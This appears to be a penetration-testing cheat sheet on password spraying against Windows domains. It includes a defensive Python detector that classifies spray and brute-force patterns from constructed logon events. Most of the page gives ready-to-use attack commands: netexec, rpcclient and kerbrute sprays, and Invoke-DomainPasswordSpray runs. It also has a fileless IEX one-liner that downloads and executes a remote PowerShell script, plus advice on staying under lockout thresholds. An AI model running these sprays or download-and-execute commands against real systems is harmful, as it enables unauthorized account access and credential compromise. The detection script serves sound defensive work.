PRIMARY CATEGORY → WINDOWS CREDENTIALS BRUTEFORCING
Theory
This technique consists of carrying out a set of logon attempts against a remote target over a given protocol, such as SMB or RPC, using a list of users and a single password as input.
Before proceeding with this type of attack, it is always mandatory to glean the Domain Password Policy (lockout threshold, observation window, lockout duration) in order to avoid locking out any domain user account.
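From the defender's side, the pattern described above (one password, many accounts, one source, within a short window) is exactly what stands out in a domain controller's failed-logon events. The script below is an added example and not part of the original cheat sheet: it parses constructed 4625/4624 lines written in a simplified `key=value` form (the field names mirror the real event's `TargetUserName`, `IpAddress` and `SubStatus`, but every line is made up), separates a spray (many users, at most a couple of failures each) from a brute force against a single account, and then lists the accounts that logged on successfully from a flagged source.

```python
"""Password-spray vs. brute-force triage over Windows logon events.

Added example for this page, not code from the original cheat sheet.
The event lines are constructed; the format is a simplified
"timestamp event_id key=value ..." rendering of 4625 (failure) and
4624 (success) events, not the real XML/EVTX layout.
"""
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample:
#   10.0.0.50 tries one password against six different accounts (spray),
#             then logs on as carol -> sprayed credential worked
#   10.0.0.77 hammers a single service account (brute force)
#   10.0.0.9  is a user mistyping her own password twice (benign)
# SubStatus 0xC000006A is the real NTSTATUS code for "wrong password".
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 4625 TargetUserName=alice IpAddress=10.0.0.50 SubStatus=0xC000006A
2024-05-01T10:00:02 4625 TargetUserName=bob IpAddress=10.0.0.50 SubStatus=0xC000006A
2024-05-01T10:00:03 4625 TargetUserName=carol IpAddress=10.0.0.50 SubStatus=0xC000006A
2024-05-01T10:00:04 4625 TargetUserName=dave IpAddress=10.0.0.50 SubStatus=0xC000006A
2024-05-01T10:00:05 4625 TargetUserName=erin IpAddress=10.0.0.50 SubStatus=0xC000006A
2024-05-01T10:00:06 4625 TargetUserName=frank IpAddress=10.0.0.50 SubStatus=0xC000006A
2024-05-01T10:00:30 4624 TargetUserName=carol IpAddress=10.0.0.50 SubStatus=0x0
2024-05-01T10:05:00 4625 TargetUserName=svc_backup IpAddress=10.0.0.77 SubStatus=0xC000006A
2024-05-01T10:05:01 4625 TargetUserName=svc_backup IpAddress=10.0.0.77 SubStatus=0xC000006A
2024-05-01T10:05:02 4625 TargetUserName=svc_backup IpAddress=10.0.0.77 SubStatus=0xC000006A
2024-05-01T10:05:03 4625 TargetUserName=svc_backup IpAddress=10.0.0.77 SubStatus=0xC000006A
2024-05-01T10:05:04 4625 TargetUserName=svc_backup IpAddress=10.0.0.77 SubStatus=0xC000006A
2024-05-01T10:05:05 4625 TargetUserName=svc_backup IpAddress=10.0.0.77 SubStatus=0xC000006A
2024-05-01T10:05:06 4625 TargetUserName=svc_backup IpAddress=10.0.0.77 SubStatus=0xC000006A
2024-05-01T10:09:00 4625 TargetUserName=alice IpAddress=10.0.0.9 SubStatus=0xC000006A
2024-05-01T10:09:20 4625 TargetUserName=alice IpAddress=10.0.0.9 SubStatus=0xC000006A
"""


def parse_events(text):
    """Parse the simplified lines into dicts; keeps only logon events 4624/4625."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts_s, event_id, *fields = line.split()
        if event_id not in ("4624", "4625"):
            continue
        kv = dict(f.split("=", 1) for f in fields)
        events.append({
            "ts": datetime.fromisoformat(ts_s),
            "event_id": event_id,
            "user": kv["TargetUserName"],
            "ip": kv["IpAddress"],
            "substatus": kv["SubStatus"],
        })
    return events


def classify_sources(events, window=timedelta(minutes=10),
                     min_users=5, max_per_user=2, bruteforce_min=6):
    """Return {ip: {"kind", "users", "failures"}} for suspicious sources.

    spray      : within one window, >= min_users distinct accounts fail and
                 no single account fails more than max_per_user times
                 (the attacker stays under the lockout threshold on purpose)
    bruteforce : within one window, a single account fails >= bruteforce_min
                 times from the same source
    Thresholds are assumptions for the sample; tune them to the domain's
    lockout policy and normal failure rate.
    """
    by_ip = defaultdict(list)
    for ev in events:
        if ev["event_id"] == "4625":
            by_ip[ev["ip"]].append(ev)

    findings = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(evs)):
            # slide the window start forward so evs[start:end+1] fits in `window`
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            per_user = Counter(e["user"] for e in evs[start:end + 1])
            kind = None
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                kind = "spray"
            elif len(per_user) == 1 and max(per_user.values()) >= bruteforce_min:
                kind = "bruteforce"
            if kind:
                # last qualifying window wins, so the user set keeps growing
                findings[ip] = {"kind": kind, "users": sorted(per_user),
                                "failures": sum(per_user.values())}
    return findings


def successful_logons_from(events, findings):
    """Accounts with a 4624 from a flagged source: the credential that worked."""
    hits = {}
    for ev in events:
        if ev["event_id"] == "4624" and ev["ip"] in findings:
            hits.setdefault(ev["ip"], []).append(ev["user"])
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    found = classify_sources(evs)
    for ip, info in found.items():
        print(f"{ip}: {info['kind']} ({info['failures']} failures) users={info['users']}")
    print("successful logons from flagged sources:", successful_logons_from(evs, found))
```

The spray rule deliberately keys on "many accounts, few failures each", because a sprayer who has read the password policy will never trip the per-account lockout counter that most alerting is built around; correlating failures by source (or by source over a short window) is what surfaces it. A success event from the same source right after the spray is the highest-priority line in the output.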
Spraying from Linux
Netexec
- Domain Level

```bash
nxc <PROTOCOL> <TARGET> --username <USER_LIST> --password '<PASSWD>'
```

- Local Level

```bash
nxc <PROTOCOL> <TARGET> --username <USER_LIST> --password '<PASSWD>' --local-auth
```

RPCclient

```bash
while IFS= read -r _user ; do rpcclient --user "${_user}%<PASSWD>" --command 'getusername ; quit' <TARGET> ; done < ./<USER_LIST> |& awk -v IGNORECASE=1 '/authority/ { gsub(/,/,"") ; print $3 }'
```

Kerbrute

```bash
kerbrute passwordspray --dc <TARGET> --domain <DOMAIN> <USER_LIST> '<PASSWD>'
```

Spraying from Windows
DomainPasswordSpray
Setup
- Fileless

```powershell
IEX (New-Object Net.WebClient).downloadString('https://github.com/dafthack/DomainPasswordSpray/raw/refs/heads/master/DomainPasswordSpray.ps1')
```

- Importing Powershell Module

```powershell
IWR -UseBasicParsing -Uri 'https://github.com/dafthack/DomainPasswordSpray/raw/refs/heads/master/DomainPasswordSpray.ps1' -OutFile '.\DomainPasswordSpray.ps1'
Import-Module .\DomainPasswordSpray.ps1
```

Usage
When executed on a domain-joined host, this tool automatically gathers all domain user accounts, so there is no need to supply a user list.
- W/O Userlist + Password

```powershell
Invoke-DomainPasswordSpray -Password '<PASSWD>' -OutFile <OUTPUT_FILE> -ErrorAction SilentlyContinue
```

- Userlist provided + Password

```powershell
Invoke-DomainPasswordSpray -UserList <USER_LIST> -Domain <DOMAIN> -Password '<PASSWD>' -OutFile <OUTPUT_FILE> -ErrorAction SilentlyContinue
```

- Userlist provided + Set of Passwords (`-PasswordList` takes a file with one password per line)

```powershell
Invoke-DomainPasswordSpray -UserList <USER_LIST> -Domain <DOMAIN> -PasswordList <PASSWD_LIST> -OutFile <OUTPUT_FILE> -ErrorAction SilentlyContinue
```